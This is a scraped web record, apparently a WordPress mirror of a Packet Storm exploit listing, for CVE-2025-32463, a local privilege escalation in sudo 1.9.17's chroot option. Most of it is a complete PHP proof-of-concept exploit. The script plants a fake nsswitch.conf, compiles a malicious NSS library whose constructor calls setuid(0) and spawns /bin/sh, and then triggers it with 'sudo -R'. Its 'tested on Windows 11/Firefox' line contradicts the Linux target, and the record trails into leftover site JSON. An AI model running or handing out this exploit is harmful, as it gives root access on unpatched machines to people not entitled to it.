{“lastseen”:”2025-11-27T18:33:39″,”description”:”sudo version 1.9.17 local privilege escalation proof of concept exploit that leverages NSS module loading…”,”published”:”2025-11-27T00:00:00″,”modified”:”2025-11-27T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 sudo 1.9.17 Local Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:212157″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-32463″],”sourceData”:”=============================================================================================================================================\\n | # Title : sudo 1.9.17 local Privilege Escalation via Sudo Chroot NSS Module Loading |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.sudo.ws\/ |\\n =============================================================================================================================================\\n \\n POC : \\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212006\/ \\u0026 \\tCVE-2025-32463\\n \\n \\n [+] Summary :\\n \\n CVE-2025-32463 is a local privilege escalation vulnerability in Sudo that allows attackers to execute arbitrary code as root \\n by exploiting the NSS (Name Service Switch) module loading mechanism within a chroot environment. \\n The vulnerability occurs when sudo’s –chroot option loads malicious NSS modules from the chroot environment.\\n \\n The vulnerability exists in sudo’s handling of NSS modules when using the –chroot option. When sudo executes a command within a chroot environment, it may load NSS modules from the chroot’s library directories rather than the host system. An attacker with local access can create a malicious chroot environment with a crafted NSS module that executes arbitrary code when loaded.\\n \\n [+] Technical Analysis :\\n \\n **Vulnerability Mechanism:**\\n \\n 1. Attacker creates a chroot environment with malicious NSS configuration\\n 2. The nsswitch.conf inside chroot points to a malicious NSS module\\n 3. When sudo –chroot is executed, it loads the malicious module\\n 4. The module’s constructor function executes with root privileges\\n \\n **Key Vulnerable Components:**\\n \\n – Sudo’s chroot implementation\\n – NSS module loading mechanism\\n – Dynamic linker behavior in chroot\\n \\n [+] Attack Flow :\\n \\n 1. **Create Malicious Chroot Structure**\\n \\n mkdir -p chtoot\/{lib,etc}\\n \\n \\n 2. **Write Malicious nsswitch.conf**\\n \\n echo \\”passwd: Xfiles\\” \\u003e chtoot\/etc\/nsswitch.conf\\n echo \\”group: files\\” \\u003e\\u003e chtoot\/etc\/nsswitch.conf\\n echo \\”shadow: files\\” \\u003e\\u003e chtoot\/etc\/nsswitch.conf\\n \\n \\n [+] Usage: php poc.php\\n \\n [+] POC :\\n \\n \\u003c?php\\n \/**\\n * PoC for CVE-2025-32463: Local privilege escalation via sudo –chroot\\n * PHP version of the Python exploit\\n * \\n * Use in lab environments only. Do not run on production systems.\\n *\/\\n \\n class SudoChrootExploit {\\n private $chroot = \\”.\/chtoot\\”;\\n private $libDir;\\n private $etcDir;\\n private $payloadC = \\”payload.c\\”;\\n private $libName = \\”libnss_Xfiles.so.2\\”;\\n private $payloadSo;\\n private $nsswitch;\\n private $verbose = false;\\n \\n public function __construct($verbose = false) {\\n $this-\\u003everbose = $verbose;\\n $this-\\u003elibDir = $this-\\u003echroot . \\”\/lib\\”;\\n $this-\\u003eetcDir = $this-\\u003echroot . \\”\/etc\\”;\\n $this-\\u003epayloadSo = $this-\\u003elibDir . \\”\/\\” . $this-\\u003elibName;\\n $this-\\u003ensswitch = $this-\\u003eetcDir . \\”\/nsswitch.conf\\”;\\n }\\n \\n private function log($msg) {\\n if ($this-\\u003everbose) {\\n echo \\”[*] \\” . $msg . PHP_EOL;\\n }\\n }\\n \\n private function setupChroot() {\\n echo \\”[+] Setting up chroot directories…\\” . PHP_EOL;\\n \\n if (!is_dir($this-\\u003elibDir)) {\\n mkdir($this-\\u003elibDir, 0755, true);\\n $this-\\u003elog(\\”Created directory: \\” . $this-\\u003elibDir);\\n }\\n \\n if (!is_dir($this-\\u003eetcDir)) {\\n mkdir($this-\\u003eetcDir, 0755, true);\\n $this-\\u003elog(\\”Created directory: \\” . $this-\\u003eetcDir);\\n }\\n \\n $this-\\u003elog(\\”Chroot structure created successfully\\”);\\n }\\n \\n private function writeNsswitch() {\\n echo \\”[+] Writing fake nsswitch.conf…\\” . PHP_EOL;\\n \\n $nsswitchContent = \\”passwd: Xfiles\\\\n\\” .\\n \\”group: files\\\\n\\” .\\n \\”shadow: files\\\\n\\”;\\n \\n if (file_put_contents($this-\\u003ensswitch, $nsswitchContent) === false) {\\n throw new Exception(\\”Failed to write nsswitch.conf\\”);\\n }\\n \\n $this-\\u003elog(\\”Written malicious nsswitch.conf to \\” . $this-\\u003ensswitch);\\n }\\n \\n private function writePayload() {\\n echo \\”[+] Writing payload source…\\” . PHP_EOL;\\n \\n $payloadCode = ‘\\n #include \\u003cstdio.h\\u003e\\n #include \\u003cstdlib.h\\u003e\\n #include \\u003cunistd.h\\u003e\\n #include \\u003cnss.h\\u003e\\n #include \\u003cpwd.h\\u003e\\n \\n __attribute__((constructor)) void init() {\\n unsetenv(\\”LD_PRELOAD\\”);\\n setuid(0);\\n setgid(0);\\n system(\\”\/bin\/sh\\”);\\n }\\n \\n enum nss_status _nss_Xfiles_getpwnam_r(const char *name, struct passwd *pwd,\\n char *buf, size_t buflen, int *errnop) {\\n return NSS_STATUS_NOTFOUND;\\n }\\n ‘;\\n \\n if (file_put_contents($this-\\u003epayloadC, $payloadCode) === false) {\\n throw new Exception(\\”Failed to write payload source\\”);\\n }\\n \\n $this-\\u003elog(\\”Written C payload to \\” . $this-\\u003epayloadC);\\n }\\n \\n private function compilePayload() {\\n echo \\”[+] Compiling malicious libnss module…\\” . PHP_EOL;\\n \\n $compileCmd = \\”gcc -fPIC -shared -o \\” . \\n escapeshellarg($this-\\u003epayloadSo) . \\” \\” .\\n escapeshellarg($this-\\u003epayloadC) . \\” -nostartfiles\\”;\\n \\n $this-\\u003elog(\\”Compilation command: \\” . $compileCmd);\\n \\n $output = [];\\n $returnCode = 0;\\n exec($compileCmd . \\” 2\\u003e\\u00261\\”, $output, $returnCode);\\n \\n if ($returnCode !== 0) {\\n throw new Exception(\\”Compilation failed: \\” . implode(\\”\\\\n\\”, $output));\\n }\\n \\n if (!file_exists($this-\\u003epayloadSo)) {\\n throw new Exception(\\”Compiled library not found: \\” . $this-\\u003epayloadSo);\\n }\\n \\n $this-\\u003elog(\\”Successfully compiled shared object to \\” . $this-\\u003epayloadSo);\\n }\\n \\n private function cleanup() {\\n echo \\”[+] Cleaning up payload source…\\” . PHP_EOL;\\n \\n if (file_exists($this-\\u003epayloadC)) {\\n if (unlink($this-\\u003epayloadC)) {\\n $this-\\u003elog(\\”Removed \\” . $this-\\u003epayloadC);\\n } else {\\n echo \\”[!] Warning: Failed to remove \\” . $this-\\u003epayloadC . PHP_EOL;\\n }\\n }\\n }\\n \\n private function runExploit() {\\n echo \\”[+] Launching sudo with chroot to trigger exploit…\\” . PHP_EOL;\\n \\n $sudoCmd = \\”sudo -R \\” . escapeshellarg($this-\\u003echroot) . \\” id\\”;\\n $this-\\u003elog(\\”Executing: \\” . $sudoCmd);\\n \\n \/\/ Method 1: Using system()\\n echo \\”[*] Attempting exploit via system()…\\” . PHP_EOL;\\n system($sudoCmd, $returnCode);\\n \\n if ($returnCode !== 0) {\\n \/\/ Method 2: Using exec with output\\n echo \\”[*] Attempting exploit via exec()…\\” . PHP_EOL;\\n $output = [];\\n exec($sudoCmd, $output, $returnCode);\\n \\n if (!empty($output)) {\\n echo \\”[*] Command output:\\” . PHP_EOL;\\n foreach ($output as $line) {\\n echo \\” \\” . $line . PHP_EOL;\\n }\\n }\\n \\n if ($returnCode !== 0) {\\n echo \\”[!] Exploit may have failed. Return code: \\” . $returnCode . PHP_EOL;\\n echo \\”[!] Check if sudo allows chroot and if gcc is installed\\” . PHP_EOL;\\n }\\n }\\n }\\n \\n private function checkDependencies() {\\n echo \\”[+] Checking dependencies…\\” . PHP_EOL;\\n \\n $dependencies = [\\n ‘sudo’ =\\u003e ‘sudo –version’,\\n ‘gcc’ =\\u003e ‘gcc –version’,\\n ];\\n \\n foreach ($dependencies as $name =\\u003e $cmd) {\\n $output = [];\\n $returnCode = 0;\\n exec($cmd . \\” 2\\u003e\/dev\/null\\”, $output, $returnCode);\\n \\n if ($returnCode === 0) {\\n $this-\\u003elog(\\”\u2713 $name is available\\”);\\n } else {\\n throw new Exception(\\”\u2717 $name is not available or not in PATH\\”);\\n }\\n }\\n \\n $this-\\u003elog(\\”All dependencies satisfied\\”);\\n }\\n \\n private function showInfo() {\\n echo \\”=== CVE-2025-32463 Exploit Information ===\\” . PHP_EOL;\\n echo \\”Vulnerability: Local privilege escalation via sudo –chroot\\” . PHP_EOL;\\n echo \\”Mechanism: Malicious NSS module loading in chroot environment\\” . PHP_EOL;\\n echo \\”Target: sudo versions with chroot capability\\” . PHP_EOL;\\n echo \\”Effect: Potential root shell execution\\” . PHP_EOL;\\n echo \\”==========================================\\” . PHP_EOL . PHP_EOL;\\n }\\n \\n public function run() {\\n try {\\n $this-\\u003eshowInfo();\\n $this-\\u003echeckDependencies();\\n $this-\\u003esetupChroot();\\n $this-\\u003ewriteNsswitch();\\n $this-\\u003ewritePayload();\\n $this-\\u003ecompilePayload();\\n $this-\\u003ecleanup();\\n $this-\\u003erunExploit();\\n \\n echo PHP_EOL . \\”[+] Exploit sequence completed.\\” . PHP_EOL;\\n \\n } catch (Exception $e) {\\n echo \\”[!] Error: \\” . $e-\\u003egetMessage() . PHP_EOL;\\n echo \\”[!] Exploit failed.\\” . PHP_EOL;\\n exit(1);\\n }\\n }\\n \\n public function __destruct() {\\n \/\/ Additional cleanup if needed\\n if (file_exists($this-\\u003epayloadC)) {\\n unlink($this-\\u003epayloadC);\\n }\\n }\\n }\\n \\n \/\/ Command line argument parsing\\n function parseArgs() {\\n $options = getopt(\\”v\\”, [\\”verbose\\”, \\”help\\”]);\\n \\n if (isset($options[‘help’])) {\\n echo \\”Usage: php \\” . basename(__FILE__) . \\” [OPTIONS]\\” . PHP_EOL . PHP_EOL;\\n echo \\”Options:\\” . PHP_EOL;\\n echo \\” -v, –verbose Enable verbose output for debugging\\” . PHP_EOL;\\n echo \\” –help Show this help message\\” . PHP_EOL . PHP_EOL;\\n echo \\”Description:\\” . PHP_EOL;\\n echo \\” Proof-of-Concept for CVE-2025-32463: Local privilege escalation\\” . PHP_EOL;\\n echo \\” via sudo –chroot using malicious NSS modules.\\” . PHP_EOL . PHP_EOL;\\n echo \\”Warning:\\” . PHP_EOL;\\n echo \\” Use in lab environments only. Do not run on production systems.\\” . PHP_EOL;\\n exit(0);\\n }\\n \\n return [\\n ‘verbose’ =\\u003e isset($options[‘v’]) || isset($options[‘verbose’])\\n ];\\n }\\n \\n \/\/ Main execution\\n if (php_sapi_name() === ‘cli’) {\\n $args = parseArgs();\\n $exploit = new SudoChrootExploit($args[‘verbose’]);\\n $exploit-\\u003erun();\\n } else {\\n echo \\”This script must be run from the command line.\\” . PHP_EOL;\\n exit(1);\\n }\\n ?\\u003e\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212157″,”cvss”:{“score”:9.3,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212157\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-11-27T18:33:39″,”description”:”sudo version 1.9.17 local privilege escalation proof of concept exploit that leverages NSS module loading…”,”published”:”2025-11-27T00:00:00″,”modified”:”2025-11-27T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 sudo 1.9.17 Local Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:212157″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-32463″],”sourceData”:”=============================================================================================================================================\\n | # Title : sudo…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,13,53,7,11,5],"class_list":["post-27867","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n